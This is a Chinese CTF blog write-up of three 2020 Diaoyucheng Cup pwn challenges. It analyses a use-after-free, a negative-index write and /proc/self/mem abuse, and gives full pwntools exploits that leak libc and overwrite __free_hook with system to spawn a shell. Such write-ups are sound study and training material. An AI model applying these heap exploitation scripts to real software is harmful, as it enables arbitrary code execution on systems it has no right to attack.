2020钓鱼城杯

字数统计: 2.1k字   |   阅读时长≈ 9分

开始钓鱼。。。

Veryeasy

程序分析

Delete函数free掉堆块后,没有将堆指针清空,存在一个 UAF漏洞。然后delete执行时的限制,必须 note_num大于free_num,作用不大,因为note_num被转为了 unsigned int

利用分析

这样的题,做了很多遍,2.27下有一个 UAF漏洞,没有输出函数。好像前几天的字节CTF也遇到类似的,但是我总感觉做的有点慢,调试那个 tcache_perthread_struct布局花了太多时间。

思路都是,劫持tcache next指针到 tcache_perthread_struct。然后释放到unsortedbin,再修改到 stdout来泄露地址。最后 free_hook一把梭得到shell

TIPS:为了将 tcache_perthread_struct放到 Unsortedbin中,我之前选择的方法是修改 tcache_perthread_struct的位置为7,再释放tcache_perthread_struct。但这样做主要是计算这个结构体比较麻烦。这次还学到一种方法,在 2.27下对tcachedouble free是没检测。如果通过 double_free构造了三个堆块,再连续分配3次,此时这个 tcache count就为-1。系统也会认为超过了7次。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
from pwn import *
context.update(arch='amd64',os='linux',log_level = 'debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug =1
if debug:
    p= process('./pwn')
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    libc = ELF('./libc.so.6')

def Create(idx, size, content):
    p.recvuntil('Your choice :')
    p.sendline('1')
    p.recvuntil('id:')
    p.sendline(str(idx))
    p.recvuntil('please input your size:')
    p.sendline(str(size))
    p.recvuntil('content:')
    p.send(content)

def Edit(idx, content):
    p.recvuntil('Your choice :')
    p.sendline('2')
    p.recvuntil('id:\n')
    p.sendline(str(idx))
    p.recvuntil('content:\n')
    p.send(content)  

def Delete(idx):
    p.recvuntil('Your choice :')
    p.sendline('3')
    p.recvuntil('id:')
    p.sendline(str(idx))

def show():
    p.recvuntil('Your choice :')
    p.sendline('4')

def Edit2(idx, content):
    p.recvuntil('Your choice :')
    p.sendline('2')
    p.recvuntil('id:')
    p.sendline(str(idx))
    p.recvuntil('content:')
    p.send(content)

while True:
    try:
        Create(0, 0xf8, '/bin/sh\x00')
        Create(1, 0xf8, '1')
        #gdb.attach(p, "bp $rebase(0xe74)")
        Delete(0)
        Delete(1)
        payload = '\x10\x00'
        Edit(1, payload)

        Create(2, 0xf8, '3')
        payload = p32(0) + p32(1) + p64(0) * 3 + '\x07\x07\x07\x07' + p32(0) + '\x07\x07\x07\x07'
        Create(3, 0xf8, payload)    #tcache_perthread
        #gdb.attach(p, "bp $rebase(0xe74)")
        Delete(3)
        Create(4, 0x30, '5')  # 3

        stdout = '\x60\x77'
        payload = '\x01\x02' + '\x00\x00'*3 + p64(0) * 5 + p64(0) + stdout
        Edit(3, payload)
        #gdb.attach(p, "bp $rebase(0xe74)")
        payload = p64(0) + stdout
        Create(5, 0x38, payload)

        payload = p64(0xfbad1800) + p64(0)*3 + '\x00'
        Create(6, 0x28, payload)    #stdout
        libc_addr = u64(p.recvuntil('\x7f', timeout=1)[-6:].ljust(8, '\x00'))
        print 'libc_addr:',hex(libc_addr)
        #gdb.attach(p, "bp $rebase(0xe74)")
        if '\x7f' not in p64(libc_addr):
            raise EOFError
        break
    except:
        p.close()
        p = process('./pwn')

libc.address = libc_addr - 0x3ed8b0
free_hook = libc.sym['__free_hook']
system_addr = libc.sym['system']
print 'libcaddr:',hex(libc.address)
print 'system_addr:',hex(system_addr)
#gdb.attach(p, "bp $rebase(0xe74)")

payload = p64(free_hook)
Edit2(5, payload)
Create(7, 0xf8, '/bin/sh\x00')
Create(8, 0x18, p64(system_addr))

Delete(7)

p.interactive()

unknown

程序分析

初始IDA分析的时候,可以看到应该是加了啥混淆的。这里学到一种从内存提取原ELF的方法:

Pwndbg里运行如下两个命令,将内存dump下来(内存dump之前只在windbg里用过):

1
2
pwndbg> dump binary memory ./dump 0x555555554000 0x555555556000
pwndbg> dump binary memory ./dump2 0x555555755000 0x555555757000

然后将dump的内存,执行如下脚本,组成一个ELF文件,即可正常分析:

1
2
3
4
5
6
7
8
9
10
# encoding=utf-8
final_f = open("./unknown_dump", "wb")
with open("./dump", "rb") as f:
    final_f.writelines(f.readlines())

with open("./dump2", "rb") as f:
    final_f.seek(0x200000)
    final_f.writelines(f.readlines())

final_f.close()

image-20201111211519293

很模板的菜单题,但是我又花了很久才找到洞。感觉这种菜单题,能够留洞的地方也就那么几个。是不是我自己尝试出一个菜单题的题,会不会对这些留洞的地方更敏感一点。

如图所示,可以看到对 Id没有检查上边界,导致存在上溢。

利用分析

chunk_list的上边就是 chunk_size_list,如果我们输入id为负数,那么就可以将分配的堆块指针写入 chunk_size_list,这样就可以更改 chunksize

这里唯一需要注意的是,在分配堆块时,会检查当前 chunk_list[id]处是否为空,如果不为空,则分配失败。

如果我们先分配了chunk_list[0],再想通过在 chunk_list[-16]chunk_size_list[0]的位置分配一个堆指针,此时会失败。因为此时 chunk_size_list[0]处是 chunk[0]size,不为空。

这个限制也很简单,当输入的size为0时,malloc会默认分配 0x20的堆块。这样 chunk_size_list[0]也为空,可以成功分配堆块到此处。

然后就是很正常的泄露地址,劫持 tcache next指针到 free_hookgetshell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
context.update(arch='amd64',os='linux',log_level = 'debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug =1
if debug:
    p= process('./unknown')
    elf = ELF('./unknown')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    libc = ELF('./libc.so.6')

def Create(idx, size):
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))

def Edit(idx, content):
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendline(content)

def Show(idx):
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Index: ', str(idx))

def Delete(idx):
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Index: ', str(idx))

def Pwn():
    #leak libc addr
    for i in range(4):
        Create(i, 0x90)
    #chunk4, 5
    Create(4, 0x0)
    Create(5, 0x0)

    for i in range(6, 11):
        Create(i, 0x90)
    Create(-12, 0x60)
    Create(-11, 0x60)

    for i in range(4):
        Delete(i)

    for i in range(11, 6, -1):
        Delete(i)

    # Create(10, 0x20)
    gdb.attach(p)

    for i in range(4):
        Create(i, 0x90)
    for i in range(7, 10):
        Create(i, 0x90)

    Create(11, 0x20)
    Show(11)
    libc.address = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, '\x00'))-0x3ebd30
    print 'libc_addr:',hex(libc.address)
    free_hook = libc.sym['__free_hook']
    system_addr = libc.sym['system']
    print 'system:',hex(system_addr)

    payload = 'a'*0x10 + p64(0) + p64(0x91) + p64(free_hook)
    payload = payload.ljust(0x60, '\x00')
    Delete(8)
    Delete(6)
    Edit(5, payload)
    Create(6, 0x90)
    Create(8, 0x90) #free_hook
    Edit(6, '/bin/sh\x00')
    Edit(8, p64(system_addr))
    Delete(6)
    p.interactive()

Pwn()

fsplayground

这道题,学到了关于 Linux下的文件相关的知识:

/proc 目录

Linux系统内核提供了一种通过 /proc文件系统,在程序运行时访问内核数据,改变内核设置的机制。 /proc是一种伪文件结构,也就是说是仅存在于内存中,不存在于外存中的。 /proc中一般比较重要的目录是 sysnetscsisys目录是可写的,可以通过它来访问和修改内核的参数

/proc中还有一些以 PID命名(进程号)的进程目录,可以读取对应进程的信息,另外还有一个 /self目录,用于记录本进程的信息。

/proc/self目录

可以通过 /proc/$PID/目录来获得该进程的信息,但是这个方法需要知道进程的PID是多少,在 fork、daemon等情况下,PID可能还会发生变化。所以 Linux提供了 self目录,来解决这个问题,不过不同的进程来访问这个目录获得的信息是不同的,内容等价于 /proc/本进程 PID目录下的内容。所以可以通过 self目录直接获得自身的信息,不需要知道 PID

/proc/self/maps

这个文件用于记录当前进程的内存映射关系,通过读取该文件可以获得内存代码段基地址

/proc/self/mem

该文件记录的是进程的内存信息,通过修改该文件相当于直接修改进程的内存。这个文件可读可写,需要结合 maps的映射信息来确定读的偏移值,无法读取未被映射的区域,只有读取的偏移值是被映射的区域才能正确读取出内容。

程序分析

实现了一个文件系统,可以对文件打开,并读写,和修改文件偏移指针。

利用分析

/proc/self/mem中记录一个进程的内存信息,我们可以先输出其所有的内存映射关系,这个有点类似 vmmap的形式,在其中找到 libc基址。然后再在 /proc/self/mem中找到 free_hook的地址,将其值修改为 system的地址。也就完成了 free_hookgetshell很重要的一步。后续即可正常 getshell了。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
context.update(arch='amd64',os='linux',log_level = 'debug')
context.terminal=(['tmux', 'splitw', '-h'])
p=process("./fsplayground")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

def openfile(name,option):
  p.recvuntil("Your choice: ")
  p.sendline('1')
  p.recvuntil("Filename: ")
  p.sendline(str(name))
  p.recvuntil("Option: ")
  p.sendline(str(option))

def closefile():
  p.recvuntil("Your choice: ")
  p.sendline('2')

def seekfile(offset):
  p.recvuntil("Your choice: ")
  p.sendline('3')
  p.recvuntil("Offset: ")
  p.sendline(str(offset))

def readfile(size):
  p.recvuntil("Your choice: ")
  p.sendline('4')
  p.recvuntil("Size: ")
  p.sendline(str(size))

def writefile(size,content):
  p.recvuntil("Your choice: ")
  p.sendline('5')
  p.recvuntil("Size: ")
  p.sendline(str(size))
  p.recvuntil("Content: ")
  p.send(content)

openfile("/proc/self/maps\x00",0)
gdb.attach(p, 'bp $rebase(0xfc7)')
readfile(0x1000)
r=p.recvuntil("6. exit").splitlines()#
find=''
for i in r:
  if 'libc-2.27.so' in i and 'r-xp' in i:
    find=i
    break
print (find)
libcbase=int(find[:12],16)
print hex(libcbase)
closefile()

openfile("/proc/self/mem\x00",1)
seekfile(libcbase+libc.sym["__free_hook"]-8)
writefile(0x10,'/bin/sh\x00'+p64(libcbase+libc.sym['system']))
p.interactive()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing